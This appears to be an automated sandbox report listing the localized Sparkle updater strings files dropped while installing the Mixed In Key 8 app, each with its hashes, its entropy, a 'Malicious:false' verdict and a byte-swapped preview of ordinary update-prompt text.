                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/no.lproj/.BC.T_oLozTU
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):2514
                                                                                                    Entropy (8bit):4.757764323583795
                                                                                                    Encrypted:false
                                                                                                    MD5:12275E60C36D9C618F995ADE804347EC
                                                                                                    SHA1:9BE178C69AD2E0B2072A5E32C02ACF623A670224
                                                                                                    SHA-256:3B579F41B32DC344ED02C583EA67D7E712E162377B4AD6D46C663E764B82BBD5
                                                                                                    SHA-512:EF5E014E7B9B56DBC3E292A6D5A89C4AADDD6BEFCAA700DB61CE0F1D0F1C75E8237B9A0152A5AF3DA31346C5CE6FF03E85BF08F1EA122FA7F5F807FFFD91E7BD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%" @fo% "@= " 1%@$o f2%@$;"..%" @@%h sab ee nnitslael dna diwllb eerda yotu esn xe titem% @tsrast !oWlu doy uilekt oeralnuhcn wo"?= " 1%@$% $2 @ah rlbti tnitslaeltro grek al rit lrbkun seetg na g3%@$s attrreo pp !iV luds attr e.p .ynttn .."?.;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$e red nynseett lijgneegilegv rejsnone"..;".@%% @sin woa avlibael( oy uahev% )@ .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$e r.n .itglejgnlegi( udh ra% $3)@ ...snek rud. .alts eed nen d.n?.;"..%" @odsen toh va eepmrsiisnot orwti eott eha ppilacitnos'd riceotyr !rA eoy uurnnni gfo f aidksi ameg ?fIn to ,sa koyrus syet mdaimintsarot rof rehpl".= " @%h rai kk eitglnasgerttgiehet rit l..s rkvi eit lrpgoarmmte sifblna!eS attrred urf aned sifkli ?vHsii kk,es .pr.d nis syetammdnisirttaroo mjhle.p;"..A"n wev reisnoo f@%h sab ee nnitslael!d " =E" nynv rejsnoa v@%h rab iltti snatllre!t;"..A"n wev reisnoo f@%i svaiaallb!e " =E" nynv rejsnoa v@%e ritglejgnlegi"!.;".nAe rr
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/pl.lproj/.BC.T_BJnDYQ
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):3858
                                                                                                    Entropy (8bit):5.0187789669222775
                                                                                                    Encrypted:false
                                                                                                    MD5:A6FA5DFECFD42E36A84351B08A9FD16F
                                                                                                    SHA1:D949A210F9FE8764BF91550DAB60CA06CADD2314
                                                                                                    SHA-256:D670F74D95B059F7B44A94978D07DDC39528CDD5AD00EBBC529900C9C1A96AFD
                                                                                                    SHA-512:782EDABDE74D899827BAE351C156BC91AB7463984CD8096AF7A6052501D9A65D113794463E0FD7BD4228C01EF19959684E61C98640B8290BA86658F2A63D4A05
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..*/" 1%@$% $2 @ah sebned wolnaoed dna dsir aeydt osu!eW uodly uol ki eoti snatlli tna deralnuhc% $1 @on?w " =%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"? ;/*".1%@$% $2 @ah sebned wolnaoed dna dsir aeydt osu!eW uodly uol ki eoti snatlli tna deralnuhc% $1 @on?w " =%"$1 @2%@$z soat..p boaryni j se togotywd o.uy.ic!aC yzc chai..yb..t rezaz iasnatolaw..i p nowoin erucuohim..% $1?@;"..*/" 1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni". ;/*".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt yga
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/pt_BR.lproj/.BC.T_oEmgh6
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):3250
                                                                                                    Entropy (8bit):4.912928929280295
                                                                                                    Encrypted:false
                                                                                                    MD5:A39C1047D2E1DE35BC79A6B6F5D35690
                                                                                                    SHA1:DE78D93D19530126B43DF7F8C6844F53623BD280
                                                                                                    SHA-256:8177B0F6884F81FEC257CB7A856FA0742B95931FAEBEE60C233975E8657C5295
                                                                                                    SHA-512:93A8D362322EB2D5EE9C4A539E3C4B11FAEFE09CBF686A9E7E94D03EB5324FFCD792DE17BF9F459FF0AB56A0AACDD939859FE888A86EFB792C28D6AAE53B4BE0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @of iabxida o ese.t .rpnootp ra asu!oG soatir aedi snatal r eerniciai r o1%@$a ogar"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =%"$1 @.no.p do ees rtaauilazode qnautn oof rxecetuda o aaptrrid emuv lomu eosemtn eedl ieutar ,ocomu ami ameg medd sioco uDCD/DV .oMav% $1 @apara p saatA lpcitaviso ,ernicieio-e t neetn vomaneet"..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$. . aevsr.. oamsir ceneetd siop.nv.le"..;".@%% @sin woa avlibael--oy uahev% .@W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @se.t .idpsno..ev-ls-auv re.so.. .3%@$ .oGtsraaid eabxi..l- ogaro?a;"..%" @odnwoldade " =%" @abxida"o.;".@%o f@% " =%"$1 @ed% $2"@.;". Aen wevsroi nfo% @sia avlibael"!= " mU aonavv re.so.d o@%e ts..d siop.nv.le
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/pt_PT.lproj/.BC.T_4oMg03
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):3412
                                                                                                    Entropy (8bit):4.852061466756839
                                                                                                    Encrypted:false
                                                                                                    MD5:ECC3E2D238E3A4081FE146066BD68D68
                                                                                                    SHA1:67545F691F19D42E54F892676DE289092109F443
                                                                                                    SHA-256:EC7CC3871D3E8131EE6CEA1951878E2DAD645ED4572AE2C6A6976AC143894E34
                                                                                                    SHA-512:9D15C9CFBF3F809F04B1107BE2ABD215A760223D339F311B4CA7A3432EDE974FE3C0009F879E7F443C7EC6472F1A4D11E01F8D67673966B3AD73B97FB94942CE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " O1%@$% $2 @of irtnafsredi o ese.t .rpnoota i snatal!rG soatir aedo f zarea ogare r ieinicrao % $1 @optsreoimrneet"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =O"% $1 @.no.p do ees rcautlazida ouqnaode tsvirea s ree exucatoda p rait redu movulema epan sedl ieutarc mo omu amigamed eidcs ouod sioc. p.itoc .oMavo % $1 @apara s aup saatA lpci.a..e.,sr ieinic-e o.a . eettn eonavemtn.e;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " O1%@$% $2 @..n seetm moneota v re.so.m ia serectn eidpsno..ev.l;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =O"% $1 @2%@$e ts..a ogard siop.nv.lee t mea v re.so.% $3.@G soatir aedo t arsnefir rgaro?a;"..%" @odnwoldade " =%" @rtnafsredi"o.;".@%o f@% " =%"$1 @ed% $2"@.;
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ro.lproj/.BC.T_V7fzdj
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):4012
                                                                                                    Entropy (8bit):4.937256495022775
                                                                                                    Encrypted:false
                                                                                                    MD5:85F6A19EDEFE691A185ABE3D9334B475
                                                                                                    SHA1:A927473A4577D28E47A0509D4E59A734FFC644A4
                                                                                                    SHA-256:C731F50896200CED0E8126B22F890FD99566B06192015F6CFEB9EEDB708C0E76
                                                                                                    SHA-512:90A751B82764EDFA132E57C0B1C94C0B58C8DF7492CB29C952B69DA8E7C47E64D42506111113ACE25E077259C9D8D6721A2A9F26DD253EF0D6B8C1EC161E52E7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @ aoftsd se.cr.ac t.. iseetg ta aedu itilazer !oDir.. i.s ... lnitsla.ai.. i.s ..l-r lenaas.. i1%@$a uc?m;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " 1%@$n uopta eif icautlazita..a utcn i.cn. dseetp roin.t .edp enuv lomur ae-dnoylc a omigani eidcss uao u inateto tpci.. .uM.t .1%@$. n.d riceotur lpAlpcitaoisn ,eropnr.et.-e oeda ocol. i.. n.ecraacd nin uo"..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$e ts e.. nrpzene tec aam ion.u .evsruiend siopinib.l..;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$e ts eidpsnobili....-.uta i3%@$ .oDir.. i.s . oedcs..cr.ai.a uc?m;"..%" @odnwoldade " =%" @edcs..crta;"..%" @fo% "@= " 1%@$d ni% $2"@.;". Aen wevsroi nfo% @sia avli
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ru.lproj/.BC.T_WY1GYG
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):4456
                                                                                                    Entropy (8bit):5.207728062803533
                                                                                                    Encrypted:false
                                                                                                    MD5:769C9A0037E04CD9A40E3EDBA1A766D7
                                                                                                    SHA1:B568AD5200E98B02CB7A25DD7510608510360933
                                                                                                    SHA-256:B901B30035274FB2A8D3F1347687B23808D8F90A238F5ED9BF7531402A1E1EB8
                                                                                                    SHA-512:A4DA065F6EAA90B696C9273B9A20B4728E6B5CEBAFD5B0E1D9ACA4EA798E3DE0B1C9ADC0F5427A9D4F26A680ABB3FB9BA1378D88F6F872FCFDD218AAF5C43DC6
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @................. ............ ........................... !............. .................. .... ........................ .1%@$"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =.".. ............ .......... .1%@$. ......... ,................................. .......... ........ ..........,.. .... ................. ,............. ........ ........ .................. ...... .................. ............. ,....... .................. ................. .......................% $1 @... ........ ..................... ,........................... .... .............. .................... ..............;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " ... ................ .............% $1 @2%@$. .............. ...............
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/sk.lproj/.BC.T_4wZrSc
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):3380
                                                                                                    Entropy (8bit):5.089001636965965
                                                                                                    Encrypted:false
                                                                                                    MD5:8183D0201D72055F55B7EFC27E301EE1
                                                                                                    SHA1:FA04D8B5DC4814EA88319E1DCAAD1EB9B4632583
                                                                                                    SHA-256:B9F6711D4C2F7F84B575AA952BCC86F25CCA8B7C6A1D097652F357D361E630FB
                                                                                                    SHA-512:D35DA5352994D66E50AA1814B9F2473A23BB624ECE75D5D4F39C26B4909C2A8221768CEAB79D0221DE279017B9410ED8B98A11FF00389519D53A84995219F320
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " pAil.kc.ai% $1 @2%@$b lo arpveaz.t . aejp irrpvane..n aop.ui.it!eC chte eetar zanni..atolav..a n ..lsdeenz onuvs upts.i .1%@$"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =A"lpki..ic u1%@$n me.on. okautlazivo.a,.a kejs uptsne..z ovz..kz u srp..aviml nen a....atin en(pa.rk.al d zboaruzd siuka elobo tpci.kh. oidks)u .rPse.ut. epail.kc.ui% $1 @odp ir.ei.kn apAlpcitaoisn ,pssuitetj udoit.a . aopot mnzvo aks..ts ekautlazi..ic.u;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2\@jn eannjvo..aid soutnp..v reiz.a;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =J" eodtspu.n .pail.kc.ai% $1 @2%@$. ..m ..et% $3.@C chte eujp erzvai..t reza"?.;".@%d wolnaoed"d= " @%p erzvta..;"..%" @fo% "@= " 1%@$z
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/sl.lproj/.BC.T_PUnJ3o
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode English text, with very long lines
                                                                                                    Size (bytes):6830
                                                                                                    Entropy (8bit):3.46495966795087
                                                                                                    Encrypted:false
                                                                                                    MD5:6638FE0CDC41D8E56D382A756D8F6CFB
                                                                                                    SHA1:760501E45FD62794DDF4E03A4136BC73414D9F52
                                                                                                    SHA-256:18DD67772BCB35F45A15E8DAA30AC67771EF5C067909F22EC92271369C9F6BD8
                                                                                                    SHA-512:CF1F3E8D62EAF83A5AE0169493BE342B27749E9436B1EF62D5917C95156190CD76C8FC1CC5921208455C44982A28EFDA7A5BBE1554D3F7319C685DD84BF61BF8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .j.e. .b.i.l. .u.s.p.e.a.n.o. .p.r.e.n.e.a.e.n. .s. .s.p.l.e.t.a. .i.n. .j.e. .p.r.i.p.r.a.v.l.j.e.n. .n.a. .n.a.m.e.s.t.i.t.e.v... .G.a. .~.e.l.i.t.e. .n.a.m.e.s.t.i.t.i. .i.n. .p.o.n.o.v.n.o. .z.a.g.n.a.t.i. .t.a.k.o.j.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".P.r.o.g.r.a.m.a. .%.1.$.@. .n.i. .m.o.g.o...e. .p.o.s.o.d.o.b.i.t.i.,. .k.e.r. .g.a. .p.o.g.a.n.j.a.t.e. .i.z. .l.o.k.a.c.i.j.e.,. .k.a.m.o.r. .p.i.s.a.n.j.e. .
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/sv.lproj/.BC.T_keapaL
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):3376
                                                                                                    Entropy (8bit):4.898536554281551
                                                                                                    Encrypted:false
                                                                                                    MD5:19CFEBADD873E045E4DC4BF5B8506FB1
                                                                                                    SHA1:0BD0E287DBAD7DC9D41B46D059F2AA8CC210E42E
                                                                                                    SHA-256:BB9593FD660C05BEDC7DEB9E190C68FA51ADCEA0C8F37107930B1B17BE26C0E5
                                                                                                    SHA-512:0CE7256082EF3C415B592D43FE7225F80C1DA6C221C167AAD76114A27AFED333CD35232C15639B0912CFEFCC74872B8D588DC94CA965DEC0C2EBD84C3C25C6E6
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @ah ralddta sen dco h.. rlkraa tta vn..dn!aV li ludi snatllre aed tco htsraat% $1 @un"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =%"$1 @ak nnietu ppadetar s.nr.d tek ..srf .rn.e nksirsvykdddav lomys moe nksvivaibdle llree npoitkse hnte .lFtyat% $1 @itllm paep nrPgoar,ms attr amod ned ..irrf..,no hcf ..sr.. kgine"..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$. r.f .. r.nr.avardn eed nesants eitll.gn.lggi aevsroien.n;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$. r.n uitll.gn.lggi..d. uah r3%@$ .iVlld ualdd aen dun"?.;".@%d wolnaoed"d= " @%n dealddta;"..%" @fo% "@= " 1%@$a v2%@$;"..A"n wev reisnoo f@%i svaiaallb!e " =E" nynv reisnoa v@%f nisnt ligl..gnil!g
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/th.lproj/.BC.T_gVnCVM
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):5916
                                                                                                    Entropy (8bit):5.025902622174575
                                                                                                    Encrypted:false
                                                                                                    MD5:0C92DA23049E5A1346DD37553AC485A7
                                                                                                    SHA1:0C06662F184345576EED454EB471D590ADEBA2E9
                                                                                                    SHA-256:0BB6AC8645986AD5E03BCCD732B30525B7DCF507704C29C17DEBACF4BED3C33B
                                                                                                    SHA-512:3CF99C2ECD68A390A27B93F14CD4C9DD724C6B632A9B09A1CB05B2918404CEA6D75C046867D2D73B5D1EA0D19736105C0C8F76F35CD933E90ABDEFBCE14E1491
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @.................................................................................................. ........................................................................... .1%@$. .........................................................."..;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =%"$1 @.......................................................................................................................................................................................................................... .............% $1 @......................................................................... ........................................ ...................................................................;"..%" @@%i sucrrnelt y
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/tr.lproj/.BC.T_EKPXlZ
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):4340
                                                                                                    Entropy (8bit):5.08681039554709
                                                                                                    Encrypted:false
                                                                                                    MD5:C6C97B845A2111FF482651A70310CC1A
                                                                                                    SHA1:976A2345D208145519C2AF1C4149C6C10775EABF
                                                                                                    SHA-256:CB792ECED2E4B941EF68CBC8B85091BE1D7F4CD344C7BB4CB31398BD35427304
                                                                                                    SHA-512:4A68BF9D332CEFBE41BC7EC3D78AD64FF5AA664FEDDB0E29D0193B45470D68D1EBA6903BA26AB80861B6148570A589DC884947992F9881DE70C1737C5C66A397
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..*/d _eEDv .0 1 -oNc moemtnp orived dybe gnniee.r* ./".1%@$% $2 @ah sebned wolnaoed dna dsir aeydt osu!eW uodly uol ki eoti snatlli tna deralnuhc% $1 @on?w " =%"$1 @2%@$i dnriliidv eukllna..amh za..!r. i.dm i.yk.elem ksiitoy rumusun?zU gyluma aeyined nab..al.tl.caka.tr."..;/. *edD_ E0v1.- N oocmmne trpvodideb yneigenre ./*..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aidksi ameg .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " 1%@$u gylumasa..d si kak.lb...i ..resiniedkyneg ..cnleelenem.zL ..ftne% $1 @yuugalam.sn...U gylumalarad zinini eokyplaya.. peyined nab..al.tn....z;"..*/d _eEDv .0 1 -oNc moemtnp orived dybe gnniee.r* ./".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$m veuc tney ne i.sr...dm...r;"..*/d _eEDv .0 1 -oNc moemtnp orived dybe gnniee.r* ./".@%% @sin woa avlibael--oy uahev% .@W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @....tk..( uKllna.d....n... z.Sr...:m% $3)@ ...miidy ne i.sr....m .niidmrkei tsrem sinizi
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/uk.lproj/.BC.T_8wKpRD
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode English text, with very long lines
                                                                                                    Size (bytes):6696
                                                                                                    Entropy (8bit):4.156961851830748
                                                                                                    Encrypted:false
                                                                                                    MD5:2BBB283FC0806301EDAE390A28116EB2
                                                                                                    SHA1:84BE78941B29ADA51DCA8D09F062DB777E6344E6
                                                                                                    SHA-256:64914509A698B22799B06ACE0831B96A1023C3A9695A74308CD5ED4B4ED0FA01
                                                                                                    SHA-512:8A7E9845EDA6702122FC087ADFE84B3DC62782F1D5E94A2A59B34A6AFB488448E47E11D054F813E865EA2D400485AAF21CDD37A9FB2A7A16CC782BCA16158AED
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .7.0.2.0.=.B.0.6.5.=.8.9. .V. .3.>.B.>.2.8.9. .4.>. .2.8.:.>.@.8.A.B.0.=.=.O.!. ...0.6.0.T.B.5. .2.A.B.0.=.>.2.8.B.8. .V. .?.5.@.5.7.0.2.0.=.B.0.6.8.B.8. .%.1.$.@.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. ."...V.4. .G.0.A. .@.>.1.>.B.8. .7. .%.1.$.@. .7. .B.>.<.C.,. .I.>. .?.@.8.7.=.0.G.5.=.8.9. .;.8.H.5. .4.;.O. .G.8.B.0.=.=.O.,. .=.0.?.@.8.:.;.0.4.,. .>.1.@.0.7.C. .4.8.A.:.0. .G.8. .>.?.B.8.G.=.>.3.>. .4.8.A.:.C.,. .9.>.
